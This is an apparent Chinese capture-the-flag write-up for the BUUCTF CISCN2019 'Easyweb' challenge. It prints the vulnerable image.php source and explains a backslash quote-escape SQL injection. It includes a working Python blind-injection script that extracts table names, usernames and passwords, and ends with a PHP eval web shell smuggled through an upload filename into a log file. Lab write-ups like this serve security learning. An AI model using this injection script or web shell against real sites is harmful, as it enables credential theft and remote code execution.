BUUCTF-[CISCN2019 总决赛 Day2 Web1]Easyweb
BUUCTF-[CISCN2019 总决赛 Day2 Web1]Easyweb

就给了一个这个。。。
先打上robots.txt看看
发现有源码备份,但不是index.php.bak。。。
看源码发现有image.php试一下,源码备份成功
<?php
include "config.php";
$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";
$id=addslashes($id);
$path=addslashes($path);
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);
$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);
$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);
可以传递id和path两个参数,触发SQL注入,前提是要绕过对id和path的过滤。接下来想办法绕过过滤,主要是破坏单引号。
$id=addslashes($id);
$path=addslashes($path);
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);
只能是用转义字符\或者单引号自己来破坏。但是用单引号一定会被替换掉,只能考虑\
如果参数中有\或者'会被在加上一个\来转义。因此如果令id为\0,id会先变成\\0。之后\0被替换掉,会剩下一个\
select * from images where id='\' or path='{$path}'
上脚本
import requests
import time
def exp(url_format,length=None):
    rlt = ''
    url  = url_format
    if length==None:
        length = 30
    for l in range(1,length+1):
    #从可打印字符开始
        begin = 32
        ends = 126
        tmp = (begin+ends)//2
        while begin<ends:
            r = requests.get(url.format(l,tmp))
            if r.content!=b'':
                begin = tmp+1
                tmp = (begin+ends)//2
            else:
                ends = tmp
                tmp = (begin+ends)//2
        #酌情删除,毕竟一般库表列里都没有空格
        if tmp == 32:
            break
        rlt+=chr(tmp)
        print(rlt)
    return rlt.rstrip()
url ='http://87942c48-9ef1-4f40-97af-3058097ac1dd.node3.buuoj.cn/image.php?id=\\0&path=or%20ord(substr(database(),{},1))>{}%23'
print('数据库名为:',exp(url))
url ='http://87942c48-9ef1-4f40-97af-3058097ac1dd.node3.buuoj.cn/image.php?id=\\0&path=or%20ord(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x636973636e66696e616c),{},1))>{}%23'
print('表名为:',exp(url))
url ='http://87942c48-9ef1-4f40-97af-3058097ac1dd.node3.buuoj.cn/image.php?id=\\0&path=or%20ord(substr((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=0x636973636e66696e616c and table_name=0x7573657273),{},1))>{}%23'
print('列名为:',exp(url))
url ='http://87942c48-9ef1-4f40-97af-3058097ac1dd.node3.buuoj.cn/image.php?id=\\0&path=or%20ord(substr((select%20group_concat(username)%20from%20users),{},1))>{}%23'
print('用户名为:',exp(url))
url ='http://87942c48-9ef1-4f40-97af-3058097ac1dd.node3.buuoj.cn/image.php?id=\\0&path=or%20ord(substr((select%20group_concat(password)%20from%20users),{},1))>{}%23'
print('密码为:',exp(url))
#url要填入自己的
跑完后,用户名:admin 密码:(看自己的)
登陆后
不能上传php,但可以上传phtml文件。BurpSuite修改文件名为一句话木马,但由于文件名中不允许出现php的字样,用短标签绕过。
<?=@eval($_POST['hack']);?>

文件名写入了logs/upload.264416e2ef7b9a13c3c467b901a84712.log.phplog.php中
上AntSword直接连

就能找到flag

 
                
            
         
         浙公网安备 33010602011771号
浙公网安备 33010602011771号